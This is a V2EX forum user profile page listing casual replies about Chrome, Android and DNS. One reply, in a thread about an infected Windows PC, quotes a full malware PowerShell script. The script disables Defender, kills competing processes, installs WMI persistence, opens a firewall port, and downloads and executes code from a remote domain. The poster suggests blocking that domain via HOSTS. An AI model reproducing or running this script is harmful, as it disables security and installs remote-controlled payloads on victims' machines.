首页 注册 登录
 GOliberation 最近的时间轴更新
GOliberation

GOliberation

V2EX 第 673969 号会员,加入于 2024-01-30 06:26:45 +08:00
今日活跃度排名 10830
Chrome 128 能冲么!?主要是 UI 可以回到旧的吗!?
Chrome  •  GOliberation  •  25 天前  •  最后回复来自 Irilsy 		5
Google Chrome 125.0.6422.61 还原老 UI 遇到的问题
程序员  •  GOliberation  •  122 天前  •  最后回复来自 johnnynewyork 		13
» GOliberation 创建的更多主题
GOliberation 最近回复了
10 天前
回复了 maleclub 创建的主题 Android 给一加宣布死刑
啥啥啥 1+ 1— 恕我直言 安卓手机都不行!🥰
11 天前
回复了 mingtdlb 创建的主题 信息安全 windows 中毒了
$sys=-join ([char[]](48..57+97..122) | Get-Random -Count (Get-Random (6..12)))
$dst="C:\Windows\debug\m\winlogon.exe"
#netsh advfirewall set allprofiles state off

Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -DisableRealtimeMonitoring $true
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /d 1 /t REG_DWORD /f

# oldservice


gwmi -Class 'Win32_Process' -Filter "Name='svchost.exe'"|%{if(($_.ExecutablePath -ne ($env:windir+'\system32\svchost.exe')) -and ($_.ExecutablePath -ne ($env:windir+'\syswow64\svchost.exe'))){$_.Terminate();del -LiteralPath $_.ExecutablePath -Force;}}
gwmi -Class 'Win32_Process' -Filter "Name='conhost.exe'"|%{if(($_.ExecutablePath -ne ($env:windir+'\system32\conhost.exe')) -and ($_.ExecutablePath -ne ($env:windir+'\syswow64\conhost.exe'))){$_.Terminate();del -LiteralPath $_.ExecutablePath -Force;}}
gwmi -Class 'Win32_Process' -Filter "Name='Runtime.exe'"|%{if(($_.ExecutablePath -eq ($env:windir+'\Runtime.exe'))){$_.Terminate();del -LiteralPath $_.ExecutablePath -Force;}}
gwmi -Class 'Win32_Process' -Filter "Name='Superfetch.exe'"|%{if(($_.ExecutablePath -eq ($env:windir+'\Tasks\Superfetch.exe'))){$_.Terminate();del -LiteralPath $_.ExecutablePath -Force;}}
gwmi -Class 'Win32_Process' -Filter "Name='ApplicationsFrameHost.exe'"|%{if(($_.ExecutablePath -eq ($env:windir+'\Tasks\ApplicationsFrameHost.exe'))){$_.Terminate();del -LiteralPath $_.ExecutablePath -Force;}}
gwmi -Class 'Win32_Process' -Filter "Name='MsTask.exe'"|%{if(($_.ExecutablePath -eq ($env:windir+'\Tasks\MsTask.exe'))){$_.Terminate();del -LiteralPath $_.ExecutablePath -Force;icacls "C:\ProgramData\migrate.exe" /setowner SYSTEM;icacls "C:\ProgramData\migrate.exe" /inheritance:r /deny "SYSTEM:F";}}
gwmi -Class 'Win32_Process' -Filter "Name='MicrosoftPrt.exe'"|%{if(($_.ExecutablePath -eq ($env:windir+'\Tasks\MicrosoftPrt.exe'))){$_.Terminate();del -LiteralPath $_.ExecutablePath -Force;}}
gwmi -Class 'Win32_Process' -Filter "Name='Wmiic.exe'"|%{if(($_.ExecutablePath -eq ($env:windir+'\Tasks\Wmiic.exe'))){$_.Terminate();del -LiteralPath $_.ExecutablePath -Force;}}
gwmi -Class 'Win32_Process' -Filter "Name='IntelConfigService.exe'"|%{if(($_.ExecutablePath -eq ($env:windir+'\Tasks\IntelConfigService.exe'))){$_.Terminate();del -LiteralPath $_.ExecutablePath -Force;}}
gwmi -Class 'Win32_Process' -Filter "Name='warp.exe'"|%{if(($_.ExecutablePath -eq ($env:windir+'\Tasks\warp.exe'))){$_.Terminate();del -LiteralPath $_.ExecutablePath -Force;}}
gwmi -Class 'Win32_Process' -Filter "Name='WmiPrvSER.exe'"|%{if(($_.ExecutablePath -eq ($env:windir+'\Microsoft.NET\Framework\v3.0\WmiPrvSER.exe'))){$_.Terminate();del -LiteralPath $_.ExecutablePath -Force;}}



$pExsit = (Get-Process winlogon -ErrorAction SilentlyContinue).Path -eq $dst
$sExsit = (Get-Service "Windows Updata" -ErrorAction SilentlyContinue).Status -eq "Running"

if ($pExsit -and $sExsit) {

IEX (New-Object system.Net.WebClient).DownloadString('http://k2ygoods.top/config.txt')
}else{
Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='updata'" | Remove-WmiObject -Verbose
Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='updata2'" | Remove-WmiObject -Verbose
Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='updata2'" | Remove-WmiObject -Verbose
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%updata%'" | Remove-WmiObject -Verbose


$filterName = 'updata'
$consumerName = 'updata2'
$exePath = 'cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString(''http://k2ygoods.top/power.txt'')'
$Query = "SELECT * FROM __InstanceModificationEvent WITHIN 10900 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
$WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name=$filterName;EventNameSpace="root\cimv2";QueryLanguage="WQL";Query=$Query} -ErrorAction Stop
$WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments @{Name=$consumerName;CommandLineTemplate=$exePath}
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer}



sc.exe stop "Windows Updata"
sc.exe delete "Windows Updata"
sc.exe stop "Windows Management"
sc.exe delete "Windows Management"

netsh advfirewall firewall add rule name="Windows Remote Management (HTTP-In)" dir=in action=allow service=any enable=yes profile=any localport=59857 protocol=tcp

#Start-Process -windowstyle hidden
IEX (New-Object system.Net.WebClient).DownloadString('http://k2ygoods.top/download.txt')
}

你给 k2ygoods.top 这个域名在 HOSTS 里面强制指向 127.0.0.1 病毒自然就失效了!
14 天前
回复了 Nyarime 创建的主题 DNS 想问一下你们平时都用哪家 DNS
8.8.8.8
17 天前
回复了 niuyun 创建的主题 程序员 30+程序员失业了,最好的选择除了送外卖还有什么?
看到河南二字就直接 PASS🙅
24 天前
回复了 AilF 创建的主题 Chrome Chrome 更新 128 版本后标签栏左侧无法靠边,强迫症求解
降级!😏
25 天前
回复了 GOliberation 创建的主题 Chrome Chrome 128 能冲么!?主要是 UI 可以回到旧的吗!?


兄弟们 有人测试过么!? 128 能冲么!?主要是 UI 可以回到旧的吗!?
25 天前
回复了 zhwguest 创建的主题 Android libweexjsb.so 是个什么鬼?
从来不用安卓手机的路过🤙
25 天前
回复了 Ritr 创建的主题 程序员 我想请教一下,如何发送鼠标或者键盘事件
用 DELPHI 吧 这些都是小问题。🤡
26 天前
回复了 7911364440 创建的主题 Windows windows 怎么永久关闭自动更新

我改了无数个地方!
» GOliberation 创建的更多回复
关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   1004 人在线   最高记录 6679   ·     Select Language
创意工作者们的社区
World is powered by solitude
VERSION: 3.9.8.5 · 13ms · UTC 19:14 · PVG 03:14 · LAX 12:14 · JFK 15:14
Developed with CodeLauncher
♥ Do have faith in what you're doing.